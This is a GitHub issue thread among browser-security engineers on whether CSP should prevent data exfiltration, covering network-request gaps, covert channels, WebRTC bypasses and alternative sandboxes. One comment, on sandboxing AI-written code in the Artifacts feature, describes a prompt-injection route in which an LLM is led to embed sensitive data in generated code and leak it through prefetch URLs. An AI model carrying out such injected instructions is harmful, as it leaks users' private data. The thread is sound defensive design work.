Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CSP and data exfiltration #656

Open
yoavweiss opened this issue Sep 11, 2024 · 20 comments
Open

CSP and data exfiltration #656

yoavweiss opened this issue Sep 11, 2024 · 20 comments

Comments

@yoavweiss
Copy link
Contributor

CSP currently has a few gaps that prevent it from being a useful anti-exfiltration mechanism. https://www.w3.org/TR/CSP3/#exfiltration hints that preventing data exfiltration may be a goal, but it's not very explicit.

I'd like to gauge folks' willingness to make anti-exfiltration an explicit goal. If we were to take that route, we'd probably want to:

That's a bunch of work, and I'm not suggesting we have to tackle all of it in one go. But I want to understand if this is something that the group is interested in, directionally.

@yoavweiss
Copy link
Contributor Author

^^ @weizman - who helped me formulate the above list

@weizman
Copy link
Member

weizman commented Sep 11, 2024

I would love to see (and help with) progress on this matter, we've been worried about data leakage for years and it could genuinely help ship safer web applications.

@ArcEglos
Copy link

I just wanted to chime in and also voice excitment on the possibility of this gaining traction!

We're making heavy use of CSPs to protect against sandboxing in our artifacts feature on claude.ai. Having these gaps closed from a CSP side would really help us feel better to build more powerful features on top of it.
If there is anything we can do to help make this happen I think we'd be happy to contribute and support.

For Context:
Artifacts is our feature that (among other things) allows people to run bits of code authored by Claude - our AI model. It runs it inside a sandbox built specifically for this using iframes and CSP. Obviously protecting against exfiltration is important for this usecase, as the code written by Claude could include sensitive information.

@weizman
Copy link
Member

weizman commented Sep 12, 2024

I just wanted to chime in and also voice excitment on the possibility of this gaining traction!

We're making heavy use of CSPs to protect against sandboxing in our artifacts feature on claude.ai. Having these gaps closed from a CSP side would really help us feel better to build more powerful features on top of it.
If there is anything we can do to help make this happen I think we'd be happy to contribute and support.

For Context:
Artifacts is our feature that (among other things) allows people to run bits of code authored by Claude - our AI model. It runs it inside a sandbox built specifically for this using iframes and CSP. Obviously protecting against exfiltration is important for this use case, as the code written by Claude could include sensitive information.

Say @ArcEglos, for such use case, wouldn't running such untrusted code within a sandboxed iframe cut it?

If it runs within such an iframe that has no origin, the ability to leak information from within it would be pointless because there won't be any sensitive information there (because everything that's sensitive is stored within the origin of your app, to which sandboxed code won't have access to).

Can you elaborate on your use case? As in, why isn't this enough for it?

@arturjanc
Copy link
Contributor

I'll share my take because this is something that's been discussed in WebAppSec several times (e.g. see this old thread) and keeps coming up :)

At a high level, I agree that it would be nice if we had a mechanism that prevented data exfiltration from attacker-controlled documents. However, the challenge is that CSP in its current shape is not it (and will arguably not be sufficient even if we address the issues we mentioned above), and - more broadly - that providing any meaningful guarantees would require solving multiple open problems that we currently don't have solutions for.

To see why, let's first establish that the only scenario in which robust exfiltration protections have value is when the attacker can execute JavaScript in the context of a document with some sensitive information we want to prevent them from leaking to the outside. If there's no injection / untrusted code execution in the first place we don't need to constrain the ability of the document to make external requests (except to prevent otherwise well-meaning developers from accidentally loading resources from untrusted destinations, which existing CSP directives already do a good enough job of restricting). If there's an injection but the attacker isn't able to execute scripts (e.g. because there's a strict CSP which prevents JS execution), the attacker may be able to make external requests, but generally won't be able to leak the secrets from the page because they will not have the ability to take these secrets and include them in the external requests they make. (There are a few caveats here, such as dangling markup attacks and CSS-based exfiltration, but let's put them aside because they can be solved with CSP and default changes to browsers.)

So, assume the attacker can execute JS in the context of a document with secrets that we want to protect and that the attacker's JS can access. The problem is that preventing this code from leaking this secrets would require all of the following:

  1. Covering all possible network requests sent by the browser by CSP directives; this requires adding controls on prefetches/preconnects, navigations (navigate-to), lower-level network APIs, etc., as @yoavweiss mentioned above.
  2. Restricting the use of JS APIs that can be used for cross-document communication. This means restricting things like postMessage, BroadcastChannel, but also the ability to set window.name, document.cookie and possibly other client-side storage APIs (localStorage, IndexedDB, etc). Some of these attacks could be addressed if the document with the attacker-supplied code is hosted in a unique origin only used once, but that assumes developers will know that this is a requirement and properly implement their origin segmentation logic.
  3. Addressing all browser-side covert channels. There are many known ways to transmit information to other documents opened by the user (e.g. attacker-controlled documents from different origins loaded in separate tabs/iframes); this includes transmitting data by modulating the use of shared resources such as CPU, GPU, bandwith, memory or disk in ways that are observable cross-origin, or exhausting browser-level limits (e.g. using up the global limit of network sockets). These seem complex, but pretty much all of them have known PoCs.

While I could imagine us doing (1) and (2) - likely with non-trivial implementation costs - we don't have any realistic solutions for (3). This is important because preventing exfiltration is unfortunately an all-or-nothing proposition. If we fix all of these channels except one, it will be insufficient at achieving the security goal we're discussing here. Given the amount of work necessary on various fronts, I'm worried that it would be quite difficult to get to a point where we meaningfully prevent exfiltration.

Finally, the challenge is that even if we built the necessary directives into browsers, a lot of the security will hinge on developers' adhering to a number of application-level constraints outside of the control of CSP (e.g. using unique origins, ensuring that there are no sibling iframes to which content could be postMessaged, enabling Cross-Origin Opener Policy, etc). We know that CSP is very easy for developers to misconfigure by crafting policies that look reasonable, but provide no real security benefit; I'd be worried that we'd create such a situation here, where it would require world-class expertise to enable anti-exfiltration defenses that aren't trivially bypassable.

Instead, what I'd suggest is to look at special-purpose APIs, similar to e.g. Fenced Frames which have exfiltration defenses as an explicit design goal. AFAIK Fenced Frames don't aim to protect against covert channels, but it could make sense to see if we could add any relevant defenses there.

@mozfreddyb
Copy link
Contributor

I will keep my comment short and say that I subscribe to @arturjanc's worry. CSP might indeed not be the best place: Adding restrictions to a document seems like an error-prone approach. Especially as the APIs available are going to be a moving target.

I'd would much rather like us to explore an environment, where there's a limited allowed set of APIs that can be expanded according to a specific threat model with strong security guarantees.

You'll have to pardon my ignorance @arturjanc, but is that what Fenced Frames is supposed to be?
Can you maybe go into some details why Fenced Frames wouldn't have to deal with the challenges you described for a CSP-control against data exfiltration?

@arturjanc
Copy link
Contributor

Can you maybe go into some details why Fenced Frames wouldn't have to deal with the challenges you described for a CSP-control against data exfiltration?

In a nutshell, the goal of Fenced Frames is to prevent a collaborating embedder and fenced frame from exchanging information with each other: "The fenced frame enforces a boundary between the embedding page and the cross-site embedded document such that user data visible to the two sites is not able to be joined together." - this implicitly does a lot of the things we'd want in a solution for preventing exfiltration.

There are a lot of details, but the main properties of fenced frames are outlined in the design, privacy and security sections of the explainer.

As is, Fenced Frames aren't a solution for data exfiltration because they allow network communication (though IIRC the original version of this proposal disabled all network requests) and don't protect against covert channels. But I could imagine incremental / opt-in changes to Fenced Frames that would get us closer to providing exfiltration protections.

@shhnjk
Copy link
Member

shhnjk commented Sep 12, 2024

I'd would much rather like us to explore an environment, where there's a limited allowed set of APIs that can be expanded according to a specific threat model with strong security guarantees.

FYI, we do have this environment for a few years now, with WASM and importObject (see https://github.com/shhnjk/as-sec). It's just that it has to be compiled before use.

@ArcEglos
Copy link

ArcEglos commented Sep 12, 2024

I just wanted to chime in and also voice excitment on the possibility of this gaining traction!

We're making heavy use of CSPs to protect against sandboxing in our artifacts feature on claude.ai. Having these gaps closed from a CSP side would really help us feel better to build more powerful features on top of it.
If there is anything we can do to help make this happen I think we'd be happy to contribute and support.

For Context:
Artifacts is our feature that (among other things) allows people to run bits of code authored by Claude - our AI model. It runs it inside a sandbox built specifically for this using iframes and CSP. Obviously protecting against exfiltration is important for this use case, as the code written by Claude could include sensitive information.

Say @ArcEglos, for such use case, wouldn't running such untrusted code within a sandboxed iframe cut it?

If it runs within such an iframe that has no origin, the ability to leak information from within it would be pointless because there won't be any sensitive information there (because everything that's sensitive is stored within the origin of your app, to which sandboxed code won't have access to).

Can you elaborate on your use case? As in, why isn't this enough for it?

The main issue is that the code itself can be sensitive or have access to sensitive information. E.g. claude could based of the information in the prompt write code that has some sensitive bits inlined into the code as strings that it then sends to the outside world when the code is executed - for example by making each of these strings a query parameter on a prefetch html element.
Also we'd ideally want to allow this untrusted code to still take specific well-defined actions (through a properly limited API between the contexts) in the outside world - e.g. reading in data from it - that could increase the amount of sensitive data in the sandbox a lot.

These scenarios are somewhat unlikely to happen by user error but there are certainly attack chains imaginable that lead to such a result.

To your points @arturjanc:

While I could imagine us doing (1) and (2) - likely with non-trivial implementation costs - we don't have any realistic solutions for (3). This is important because preventing exfiltration is unfortunately an all-or-nothing proposition.

I do agree with the characterization of these three categories. Thank you for seperating them out so nicely! But I do think that there is significant value to be had by just solving (1) and (2), because it still makes the attack chains a lot harder to execute depending on the specific circumstances and reduce the surface, which is helpful as a mitigation. At the end of the day security is often a question of lowering the probability to an acceptable but non-0 level.

I'd be worried that we'd create such a situation here, where it would require world-class expertise to enable anti-exfiltration defenses that aren't trivially bypassable.

This is certainly a relevant worry. It's already quite complicated currently and this would certainly make the list of things you can forget about longer. However, I would argue that it would not make it worse than the current situation and would still be a win.

However, my counterpoints are ONLY relevant if the two worlds to choose between are improvements to the CSP vs the current state. If there is a third world where we have other robust mechanisms to stop such exfiltration that would of course be even better!
I am, however a bit worried in that this sounds like a multi-year project to get something like this on the road, while to me - and I say that very much as an outsider, so please apply many grains of salt to this - it feels like targetted improvements to the CSP could have some value (albeit less of it) faster.

@shhnjk

I'd would much rather like us to explore an environment, where there's a limited allowed set of APIs that can be expanded according to a specific threat model with strong security guarantees.

FYI, we do have this environment for a few years now, with WASM and importObject (see https://github.com/shhnjk/as-sec). It's just that it has to be compiled before use.

One question from someone not doing a ton of things with wasm myself yet: This would still require to run untrusted code outside of this primitive for doing DOM interactions, did I get this right? Or did I miss something on how this interacts

@shhnjk
Copy link
Member

shhnjk commented Sep 12, 2024

I'd would much rather like us to explore an environment, where there's a limited allowed set of APIs that can be expanded according to a specific threat model with strong security guarantees.

FYI, we do have this environment for a few years now, with WASM and importObject (see https://github.com/shhnjk/as-sec). It's just that it has to be compiled before use.

One question from someone not doing a ton of things with wasm myself yet: This would still require to run untrusted code outside of this primitive for doing DOM interactions, did I get this right? Or did I miss something on how this interacts

Right, the WASM environment does not have access to the DOM or network by default (which provides the security guarantees). You can then expose arbitrary APIs to WASM via inportObject (see this inportObject code and WASM code).

@arturjanc
Copy link
Contributor

But I do think that there is significant value to be had by just solving (1) and (2), because it still makes the attack chains a lot harder to execute depending on the specific circumstances and reduce the surface, which is helpful as a mitigation.

I empathize with this view, but the problem is that browsers would need to invest significant resources in implementing capabilities to restrict various existing behaviors -- and developers would need to invest in deploying these restrictions in their services -- to achieve a security property that stops holding as soon as the user has any attacker-controlled document open in their browser. This is generally not how we want the web security model to work - we need to have robust boundaries and assume that the user may be concurrently viewing untrusted content (also because it's often easy for a malicious site to navigate the user to chosen endpoints on the victim site and set up the right conditions for exfiltration).

This would be less of a concern if the primitives existed in the platform, or were trivial to add, and it was just a question of getting developers to use them. But the necessary CSP knobs here are non-trivial to build and in some cases run into concerns (e.g. navigate-to had some issues with redirect-based XS-leaks); so it would require a big effort and cross-browser consensus, which makes the security "ROI" here somewhat dubious.

I am, however a bit worried in that this sounds like a multi-year project to get something like this on the road, while to me - and I say that very much as an outsider, so please apply many grains of salt to this - it feels like targetted improvements to the CSP could have some value (albeit less of it) faster.

I actually think it may be the other way around here, for a number of reasons. CSP is a very general mechanism usually enabled as a mitigation against script execution in the event of injections; it's commonly applied to an entire service/webapp and requires configurability that allows creating policies that will be adoptable in existing content (e.g. fine-grained allowlists for each directive). It's also overloaded with complexity and hard to extend for a variety of unfortunate reasons.

The use cases where we'd benefit from exfiltration protections are very different: it's usually about applying restrictions to a separate document (e.g. iframe) where an attacker can execute scripts that have access to some sensitive data. To achieve exfiltration protections here we don't need a dozen different configurable settings, we just need that context to completely turn off the three main communication channels we're discussing here (network requests, local communication/storage APIs, covert channels), which is simpler conceptually than building fine-grained controls for all these things.

So, counter-intuitively, I'd expect a new special-purpose API to be a more promising approach here, largely because it avoids the baggage of having to integrate with CSP. I'm not sure how easy it will be to sell browser vendors on this idea, but I'd expect this to be on par with selling them on extending CSP :)

@ArcEglos
Copy link

Thanks a lot for the wider context of these things! Super helpful to calibrate things in my head.

I guess the way to go about convincing browser vendors about such new API is not in this github issue? If that assumption is correct I'd be super thankful if you had any advice on how best to approach working towards this - assuming that there might be some possibility of us being willing to contribute/sponsor efforts.

@dveditz
Copy link
Member

dveditz commented Sep 14, 2024

CSP currently has a few gaps that prevent it from being a useful anti-exfiltration mechanism. https://www.w3.org/TR/CSP3/#exfiltration hints that preventing data exfiltration may be a goal, but it's not very explicit.

At one point anti-exfiltration was an explicit NON-goal!

@arturjanc
Copy link
Contributor

I guess the way to go about convincing browser vendors about such new API is not in this github issue?

I think it could make sense to discuss this at one of the upcoming WebAppSec meetings (possibly at TPAC in a week or so) and see what folks think about an anti-exfiltration web security primitive. /cc @mikewest who might have thoughts :)

@estark37
Copy link
Contributor

While I agree that CSP is not so promising for preventing exfiltration, I have my doubts about a dedicated API. It's hard for me to imagine how we would define which attacks are in and out of scope. Fenced Frames, AIUI, is sort of trying to reduce abusive behavior at scale, so it's okay-ish for it to not have a firm security boundary, but that becomes less plausible as the goal becomes closer to categorically preventing exfiltration.

I'd be interested to hear more about the use cases, in particular if they need to accommodate arbitrary code operating on arbitrary data, or how much the code and/or data can be constrained in such a way to make the problem easier. Also, does the code really need to run in the browser, or could it run remotely?

@ArcEglos
Copy link

At least in our case the code is indeed very arbitrary. Essentially the user asks the LLM to build a tool or interactive experience for them (or the LLM decides based on the user query that this is the best way to help the user with their query).

This can mean making a webgl based particle simulation illustrating a physical process, it can be a web UI that allows the user to enter data that is then processed and stored in some way (e.g. a task tracker or something similar), it could be a dashboard that reads some data from attached context and visualises it in an interactive UI for the user to filter or scroll along in a timeline. It could also be an interactive presentation that mixes traditional looking slides with mini games in between. Or a mix of all of the above. What they all have in common are basically only:

  1. They have some kind of interactive UI
  2. They are not authored by the user

It's ephemeral arbitrary software.

There is a few different attack vectors but one of the most prominent ones is prompt injection, meaning some malicious actor managing to - unbeknownst to the user - inject instructions into the query that instruct the LLM to exfiltrate data using this doorway.

I'm sceptical about running the code remotely because of the inherit interactivity of most of these experiences that would make it hard. It might be possible in the long term to have fairly decent protection against such prompt injection, but it will likely never be a provably reliable protection. So especially if these experiences get more complex over the coming years and at the same time they get adopted by more professional institutions this will probably still stay a weakpoint without good exfiltration protection.

It would be completely acceptable for for example WebRTC or WebTransport to not be available at all in these contexts, that would be a limitation that would easily be worth it.

As an illustration maybe a few examples of things colleagues or other people on the internet have built this way (these are explicitly published ones where exfiltration is not so relevant, but in most usage these would live inside your account next to a conversation with the LLM and would be very private):
https://claude.site/artifacts/12fe4ec9-8593-4868-8656-ab0d0fbb35bf
https://x.com/taekie/status/1833296667040485784
https://claude.site/artifacts/3b036fbc-4025-471f-a669-878936d0b6a3
https://claude.site/artifacts/0cabdb21-0787-46cd-ab4b-aed538a91000
https://claude.site/artifacts/a882fcd1-d5de-408b-81c1-debf768260cf
https://x.com/MaxZiebell/status/1835649986819686785

These are all created without the user doing any coding. Currently these are all more or less toy-like, mostly because they are missing basic APIs to interact with data of the user in a meaningful way. They will very quickly evolve into useful tools.

@weizman
Copy link
Member

weizman commented Sep 17, 2024

Here's my "counter" take @arturjanc, as I think solving this problem is actually very important.

At a high level, I agree that it would be nice if we had a mechanism that prevented data exfiltration from attacker-controlled documents. However, the challenge is that CSP in its current shape is not it (and will arguably not be sufficient even if we address the issues we mentioned above), and - more broadly - that providing any meaningful guarantees would require solving multiple open problems that we currently don't have solutions for.

I can't respond to that, I am only at the beginning of my journey to learn the complexity of security models in browsers, I trust you know best.

To see why, let's first establish that the only scenario in which robust exfiltration protections have value is when the attacker can execute JavaScript in the context of a document with some sensitive information we want to prevent them from leaking to the outside. If there's no injection / untrusted code execution in the first place we don't need to constrain the ability of the document to make external requests (except to prevent otherwise well-meaning developers from accidentally loading resources from untrusted destinations, which existing CSP directives already do a good enough job of restricting). If there's an injection but the attacker isn't able to execute scripts (e.g. because there's a strict CSP which prevents JS execution), the attacker may be able to make external requests, but generally won't be able to leak the secrets from the page because they will not have the ability to take these secrets and include them in the external requests they make. (There are a few caveats here, such as dangling markup attacks and CSS-based exfiltration, but let's put them aside because they can be solved with CSP and default changes to browsers.)

I completely agree that execution of untrusted code is needed for data leakage to become a problem worth fixing, especially since you did not ignore the small subset types of attacks that don't require JS necessarily (css/mu related).

However, based on the tone I'm gathering that you imply that this is a niece problem, somewhere along the lines of "if one can execute JS, we have far worse problems than info leakage".

In the era where attacks that translate into code execution were mostly limited to XSS, I think that statement would have been very true, but the way we build web apps changed dramatically, and now most of the code our apps are made of is code created and controlled by entities that are not us, aka supply-chain driven development.

This paradigm shift changes how we should look at attacks against the origin of an app, and more importantly, how to defend against them.

There's something more straightforward at mitigating XSS attacks due to how they're essentially code that comes from outside of the app or have somewhat clear sinks, but with supply chain attacks, it's the opposite - the code that introduces the attack is code we trust, so telling good code from bad becomes a very abstract task.

While we're coming up with a lot of ways to handle this shift of thinking, there's an essential concept of defense we have to embrace (IMO) given how it becomes too hard to point at a specific sink and shut it down, and that is the concept of hardening our origin.

That's somewhat intuitive - if it's becoming too abstract to identify attacks on our origin due to the power we grant others to run code within it (aka dependencies), as opposed to before, we now must assume an attacker was allowed to run in our origin by us, which means we must harden the security of our origin from within, as well as from outside.

A very big part of that, is having full control over outgoing network - if we assume there's an attacker within our origin, it makes a lot of sense to prevent them from stealing origin-sensitive information.

So, assume the attacker can execute JS in the context of a document with secrets that we want to protect and that the attacker's JS can access. The problem is that preventing this code from leaking this secrets would require all of the following:

  1. Covering all possible network requests sent by the browser by CSP directives; this requires adding controls on prefetches/preconnects, navigations (navigate-to), lower-level network APIs, etc., as @yoavweiss mentioned above.

100%

  1. Restricting the use of JS APIs that can be used for cross-document communication. This means restricting things like postMessage, BroadcastChannel, but also the ability to set window.name, document.cookie and possibly other client-side storage APIs (localStorage, IndexedDB, etc). Some of these attacks could be addressed if the document with the attacker-supplied code is hosted in a unique origin only used once, but that assumes developers will know that this is a requirement and properly implement their origin segmentation logic.

Why is that? I could use some clarification on this, because this proposal focuses on "browser-to-outside" communication, this section here addresses "in-browser-document-to-document" communication, which is just something else, a completely different attack vector that in order to be leveraged into "browser-to-outside" communication would require more prerequisites for attackers to pull off.

  1. Addressing all browser-side covert channels. There are many known ways to transmit information to other documents opened by the user (e.g. attacker-controlled documents from different origins loaded in separate tabs/iframes); this includes transmitting data by modulating the use of shared resources such as CPU, GPU, bandwith, memory or disk in ways that are observable cross-origin, or exhausting browser-level limits (e.g. using up the global limit of network sockets). These seem complex, but pretty much all of them have known PoCs.

Again, Same as the section before, while this is possible, the needed prerequisites for this vector to turn into a "browser-to-outside" communication make this a completely different problem that I don't find to be in scope.

Regarding the last 2 sections, the most important part is that not only they're different in nature and require complex conditions to exist by an attacker in addition to code execution, the web as a platform provides builders with the tools needed to address these issues (e.g. use frame-src to block unwanted cross origins to begin with).

That is the core difference between these sections and section (1), which is not addressable no matter how willing builders are to embrace all security means of the web - and that is why section 1 should be addressed regardless of the last two.

While I could imagine us doing (1) and (2) - likely with non-trivial implementation costs - we don't have any realistic solutions for (3). This is important because preventing exfiltration is unfortunately an all-or-nothing proposition. If we fix all of these channels except one, it will be insufficient at achieving the security goal we're discussing here. Given the amount of work necessary on various fronts, I'm worried that it would be quite difficult to get to a point where we meaningfully prevent exfiltration.

This is the part where I might need some further clarification, because as I said earlier, I don't see why that's true. Fixing the first, to me, seems highly beneficial, especially when integrated with already existing controls such as blocking unwanted cross-origin documents, which can address sections (2) and (3) AFAIU (if otherwise, would love to be educated)

Finally, the challenge is that even if we built the necessary directives into browsers, a lot of the security will hinge on developers' adhering to a number of application-level constraints outside of the control of CSP (e.g. using unique origins, ensuring that there are no sibling iframes to which content could be postMessaged, enabling Cross-Origin Opener Policy, etc). We know that CSP is very easy for developers to misconfigure by crafting policies that look reasonable, but provide no real security benefit; I'd be worried that we'd create such a situation here, where it would require world-class expertise to enable anti-exfiltration defenses that aren't trivially bypassable.

Personal opinion - the fact builders fail to embrace CSP, does not make it a failure, because while many builders failed to adopt it, those who managed to, were successful in providing real security to the origin of their app, which would not have been possible otherwise - huge success, CSP IMO is awesome, which is why my take is the opposite - even if not all will successfully adopt these new directives, they will bring great value for those who will, as they currently have zero tools to defend against this problem. Combine that with an uprise in need for a solution (in ctx of my former supply-chain argument) - pushing this forward could be an important progress.

Instead, what I'd suggest is to look at special-purpose APIs, similar to e.g. Fenced Frames which have exfiltration defenses as an explicit design goal. AFAIK Fenced Frames don't aim to protect against covert channels, but it could make sense to see if we could add any relevant defenses there.

Fenced Frames, as well as many other "sandboxing" solutions, just won't cut it. They can be very useful for many use cases, but moving untrusted code away from the protected origin is practical to only a certain extent, and can't be generally applied to all code we don't trust. Both because it's an impractical expectation (if to talk about expecting builders to adopt stuff), but mostly because moving untrusted code to another origin bares significant disadvantages I expect many products won't be able to deal with (many already can't), specifically breakage of synchronicity, identity discontinuity, and generally an inferior way to virtualize a JS environment that must have access to some feature of the protected origin (such as DOM).

So while solutions such as Fenced Frames would do a great job in confining untrusted code from such exfiltrations, those with use cases that prevent them from moving all untrusted code away from the origin (whether in favor of achieving fine grained composability or just because that's just the case with supply-chain driven development), should also be provided with proper solutions to their problem, so that they can harden their origin instead of forcing them to manage to migrate all untrusted code away from it.

I discuss this last argument furthermore in a discussion under the RIC proposal we're advocating for around similar concerns with moving untrusted code away from the origin and how feasible that it - WICG/Realms-Initialization-Control#18 (comment) (which is btw, a proposal that focuses on hardening your origin for similar arguments).

This is my opinion, I felt it's important I voiced it out.

I believe that if there are enough people who see things the same way (that we should shoot for embedment of untrusted code within the origin of the app for superior composability features in addition to "sandboxing" solutions), they should be represented by the web.

Unless this is truly something too complex to achieve "engineering-wise" in the browser, which I trust you (and @yoavweiss) to know better than I do.

@lknik
Copy link

lknik commented Sep 17, 2024

Thank you, @arturjanc for the remarkable (and concise!) writeup. I share your point, as for points (1) and (2). Though (3) is quite tricky to fully fix from a web browser one could assume that it shouldn’t be a show stopper for (1) and (2) to work. In other words, perhaps there are no needs of having a completely bullet-proof, ideal product in here, assuming that (3) is something else.

Now I adding another selling point to Fenced Frames is also a good take. Though there’s one difference here: Fenced Frames have no reporting functionality (about potential violations). But since I was analysing it, and Privacy Sandbox, from a privacy and data protection point of view… I actually believe that adding an explicit reporting functionality to Fenced Frame would be a good idea. In this way the exfiltration feature could be fully transferred to Fenced Frames. Would there be an interest in that is another story.

@benatkin
Copy link

benatkin commented Nov 10, 2024

This issue lays out the problem well. The quickest way I would use to accurately describe the problem is bypassing the intent of the Content Security Policy. This is definitely possible with WebRTC. I even reproduced this myself. It almost seems bad enough that I want to avoid discussing it openly and only send emails to security addresses. But it's already out in the open.

It seems that with link prefetching there may be a bypass of a CSP with default-src: 'none' and network access only allowed to certain hosts, but I haven't seen it reproduced. It also seems that the default-src: 'none' applied to <link> tags has reached maturity that the WebRTC directive hasn't (if you add the webrtc directive to your CSP, you'll get errors in your browser's dev tools).

Currently the CSP can prevent accidentally exfiltrating data pretty well, and it seems it can also prevent sneaking in some code that will do that, because the code would have to access RTCPeerConnection, or maybe create a link element (which can be in any part of the document, not just the head). What it can't do is stop untrusted code running in an iframe from exfiltrating data. Fortunately, the spec stops short of claiming that it can.

It may be possible to run untrusted code in a Worker. Luckily the workers don't have access to RTCPeerConnection. They do have access to WebTransport, but having read through WebTransport I don't think it enables a bypass and that the changes being discussed are for unusual situations or for future additions, and not needed to prevent unintended network access at the present. Basically, from my reading, only if connect-src allows a host will WebTransport try and configure an SSL certificate for a connection. Unlike code running in an iframe, code running in a worker is also safe from the potential issue with link tags because cannot directly insert link tags into the HTML.

The question I'd like us to ask, is what can we do to get browser vendors to prevent the intent of the CSP from being bypassed? That is, make it so when we try to express that a page should only be allowed to query certain hosts, that it can only make network requests (including DNS) to those hosts? That could be the site itself, Google Fonts, or what have you. WebRTC allows DNS queries to third parties which is why I think it would be nice if browser vendors made this web platform test pass.

@benatkin
Copy link

benatkin commented Nov 11, 2024

Also, with navigate-to, even though I think there's a solid workaround of running untrusted/semitrusted code in an iframe with a sandbox, and a parent having a child-src, that workaround is a pain on mobile due to layout issues of putting everything in an iframe, as well as maybe SEO issues, and isn't in common use. So that seems important. It also puts the RTCPeerConnection issue into perspective, and I realize I needn't worry about exposing this issue, because it only has an impact on those trying to build a custom sandboxing technique. We have posts like this one to know that we should be careful. I'm using WebAssembly more because of this FWIW.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

10 participants